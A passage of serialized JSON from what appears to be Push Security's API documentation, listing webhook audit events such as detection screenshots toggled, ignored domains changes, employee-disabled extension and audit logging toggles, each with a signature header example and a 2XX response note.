t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_666"}},"responseCodes":["2XX"],"pointer":"detection-classification-updated","href":"audit/detection-classification-updated-event","openApiOperationId":"detection-classification-updated-event","summary":"Detection classification updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_666","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_666"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/detection-classification-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/detection-classification-updated-event"}],"panels":[]}]},"httpPath":"detection-classification-updated"},{"label":"Detection screenshots toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/detection-screenshots-toggled-event","routeSlug":"/webhooks-v1/audit/detection-screenshots-toggled-event","metadata":{"seo":{"title":"Detection screenshots toggled","description":"An admin user has enabled or disabled detection screenshots."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"detection-screenshots-toggled-event","name":"Detection screenshots toggled","isWebhook":true,"pointer":"/paths/detection-screenshots-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Detection screenshots toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has enabled or disabled detection screenshots."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/detection-screenshots-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_667"}},"schemaId":"schema_667","pointer":"/paths/detection-screenshots-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"detection-screenshots-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_667"}},"responseCodes":["2XX"],"pointer":"detection-screenshots-toggled","href":"audit/detection-screenshots-toggled-event","openApiOperationId":"detection-screenshots-toggled-event","summary":"Detection screenshots toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_667","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_667"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/detection-screenshots-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/detection-screenshots-toggled-event"}],"panels":[]}]},"httpPath":"detection-screenshots-toggled"},{"label":"Domain category blocking ignored domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/domain-category-blocking-ignored-domains-added-event","routeSlug":"/webhooks-v1/audit/domain-category-blocking-ignored-domains-added-event","metadata":{"seo":{"title":"Domain category blocking ignored domains added","description":"A set of domains have been added to the list of ignored domains for the Domain category blocking feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"domain-category-blocking-ignored-domains-added-event","name":"Domain category blocking ignored domains added","isWebhook":true,"pointer":"/paths/domain-category-blocking-ignored-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Domain category blocking ignored domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of ignored domains for the Domain category blocking feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/domain-category-blocking-ignored-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_668"}},"schemaId":"schema_668","pointer":"/paths/domain-category-blocking-ignored-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"domain-category-blocking-ignored-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_668"}},"responseCodes":["2XX"],"pointer":"domain-category-blocking-ignored-domains-added","href":"audit/domain-category-blocking-ignored-domains-added-event","openApiOperationId":"domain-category-blocking-ignored-domains-added-event","summary":"Domain category blocking ignored domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_668","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_668"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/domain-category-blocking-ignored-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/domain-category-blocking-ignored-domains-added-event"}],"panels":[]}]},"httpPath":"domain-category-blocking-ignored-domains-added"},{"label":"Domain category blocking ignored domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/domain-category-blocking-ignored-domains-removed-event","routeSlug":"/webhooks-v1/audit/domain-category-blocking-ignored-domains-removed-event","metadata":{"seo":{"title":"Domain category blocking ignored domains removed","description":"A set of domains have been removed from the list of ignored domains for the Domain category blocking feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"domain-category-blocking-ignored-domains-removed-event","name":"Domain category blocking ignored domains removed","isWebhook":true,"pointer":"/paths/domain-category-blocking-ignored-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Domain category blocking ignored domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of ignored domains for the Domain category blocking feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/domain-category-blocking-ignored-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_669"}},"schemaId":"schema_669","pointer":"/paths/domain-category-blocking-ignored-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"domain-category-blocking-ignored-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_669"}},"responseCodes":["2XX"],"pointer":"domain-category-blocking-ignored-domains-removed","href":"audit/domain-category-blocking-ignored-domains-removed-event","openApiOperationId":"domain-category-blocking-ignored-domains-removed-event","summary":"Domain category blocking ignored domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_669","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_669"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/domain-category-blocking-ignored-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/domain-category-blocking-ignored-domains-removed-event"}],"panels":[]}]},"httpPath":"domain-category-blocking-ignored-domains-removed"},{"label":"Domain enrichment toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/domain-enrichment-toggled-event","routeSlug":"/webhooks-v1/audit/domain-enrichment-toggled-event","metadata":{"seo":{"title":"Domain enrichment toggled","description":"An admin user has enabled or disabled domain enrichment."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"domain-enrichment-toggled-event","name":"Domain enrichment toggled","isWebhook":true,"pointer":"/paths/domain-enrichment-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Domain enrichment toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has enabled or disabled domain enrichment."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/domain-enrichment-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_670"}},"schemaId":"schema_670","pointer":"/paths/domain-enrichment-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"domain-enrichment-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_670"}},"responseCodes":["2XX"],"pointer":"domain-enrichment-toggled","href":"audit/domain-enrichment-toggled-event","openApiOperationId":"domain-enrichment-toggled-event","summary":"Domain enrichment toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_670","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_670"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/domain-enrichment-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/domain-enrichment-toggled-event"}],"panels":[]}]},"httpPath":"domain-enrichment-toggled"},{"label":"Employees added to group","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/employees-added-to-group-event","routeSlug":"/webhooks-v1/audit/employees-added-to-group-event","metadata":{"seo":{"title":"Employees added to group","description":"An admin user has added one or more employees to a group."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employees-added-to-group-event","name":"Employees added to group","isWebhook":true,"pointer":"/paths/employee-added-to-group/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employees added to group","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has added one or more employees to a group."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employee-added-to-group/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_671"}},"schemaId":"schema_671","pointer":"/paths/employee-added-to-group/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employee-added-to-group","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_671"}},"responseCodes":["2XX"],"pointer":"employee-added-to-group","href":"audit/employees-added-to-group-event","openApiOperationId":"employees-added-to-group-event","summary":"Employees added to group"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_671","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_671"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employee-added-to-group/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/employees-added-to-group-event"}],"panels":[]}]},"httpPath":"employee-added-to-group"},{"label":"Employee disabled extension","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/employee-disabled-extension-event","routeSlug":"/webhooks-v1/audit/employee-disabled-extension-event","metadata":{"seo":{"title":"Employee disabled extension","description":"An employee has temporarily disabled the Push extension for a specific domain."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employee-disabled-extension-event","name":"Employee disabled extension","isWebhook":true,"pointer":"/paths/employee-disabled-extension/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employee disabled extension","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An employee has temporarily disabled the Push extension for a specific domain."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employee-disabled-extension/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_672"}},"schemaId":"schema_672","pointer":"/paths/employee-disabled-extension/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employee-disabled-extension","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_672"}},"responseCodes":["2XX"],"pointer":"employee-disabled-extension","href":"audit/employee-disabled-extension-event","openApiOperationId":"employee-disabled-extension-event","summary":"Employee disabled extension"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_672","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_672"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employee-disabled-extension/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/employee-disabled-extension-event"}],"panels":[]}]},"httpPath":"employee-disabled-extension"},{"label":"Excluded extension domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/excluded-extension-domains-added-event","routeSlug":"/webhooks-v1/audit/excluded-extension-domains-added-event","metadata":{"seo":{"title":"Excluded extension domains added","description":"A set of domains have been added to the list of excluded browser extension domains to monitor."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"excluded-extension-domains-added-event","name":"Excluded extension domains added","isWebhook":true,"pointer":"/paths/excluded-extension-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Excluded extension domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of excluded browser extension domains to monitor."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/excluded-extension-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_673"}},"schemaId":"schema_673","pointer":"/paths/excluded-extension-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"excluded-extension-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_673"}},"responseCodes":["2XX"],"pointer":"excluded-extension-domains-added","href":"audit/excluded-extension-domains-added-event","openApiOperationId":"excluded-extension-domains-added-event","summary":"Excluded extension domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_673","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_673"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/excluded-extension-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/excluded-extension-domains-added-event"}],"panels":[]}]},"httpPath":"excluded-extension-domains-added"},{"label":"Extended audit logging toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/extended-audit-logs-toggled-event","routeSlug":"/webhooks-v1/audit/extended-audit-logs-toggled-event","metadata":{"seo":{"title":"Extended audit logging toggled","description":"An admin user has enabled or disabled extended audit logging."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"extended-audit-logs-toggled-event","name":"Extended audit logging toggled","isWebhook":true,"pointer":"/paths/extended-audit-logs-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Extended audit logging toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has enabled or disabled extended audit logging."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/extended-audit-logs-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_674"}},"schemaId":"schema_674","pointer":"/paths/extended-audit-logs-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"extended-audit-logs-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_674"}},"responseCodes":["2XX"],"pointer":"extended-audit-logs-toggled","href":"audit/extended-audit-logs-toggled-event","openApiOperationId":"extended-audit-logs-toggled-event","summary":"Extended audit logging toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_674","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_674"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/extended-audit-logs-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/extended-audit-logs-toggled-event"}],"panels":[]}]},"httpPath":"extended-audit-logs-toggled"},{"label":"Excluded extension domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/excluded-extension-domains-removed-event","routeSlug":"/webhooks-v1/audit/excluded-extension-domains-removed-event","metadata":{"seo":{"title":"Excluded extension domains removed","description":"A set of domains have been removed from the list of excluded browser extension domains to monitor."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"excluded-extension-domains-removed-event","name":"Excluded extension domains removed","isWebhook":true,"pointer":"/paths/excluded-extension-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Excluded extension domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of excluded browser extension domains to monitor."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/excluded-extension-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_675"}},"schemaId":"schema_675","pointer":"/paths/excluded-extension-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"excluded-extension-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_675"}},"responseCodes":["2XX"],"pointer":"excluded-extension-domains-removed","href":"audit/excluded-extension-domains-removed-event","openApiOperationId":"excluded-extension-domains-removed-event","summary":"Excluded extension domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_675","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_675"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/excluded-extension-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/excluded-extension-domains-removed-event"}],"panels":[]}]},"httpPath":"excluded-extension-domains-removed"},{"label":"Extension branding logo uploaded","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/extension-branding-logo-uploaded-event","routeSlug":"/webhooks-v1/audit/extension-branding-logo-uploaded-event","metadata":{"seo":{"title":"Extension branding logo uploaded","description":"The browser extension banner branding logo has been uploaded"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"extension-branding-logo-uploaded-event","name":"Extension branding logo uploaded","isWebhook":true,"pointer":"/paths/extension-branding-logo-uploaded/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Extension branding logo uploaded","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The browser extension banner branding logo has been uploaded"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/extension-branding-logo-uploaded/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_676"}},"schemaId":"schema_676","pointer":"/paths/extension-branding-logo-uploaded/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"extension-branding-logo-uploaded","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: 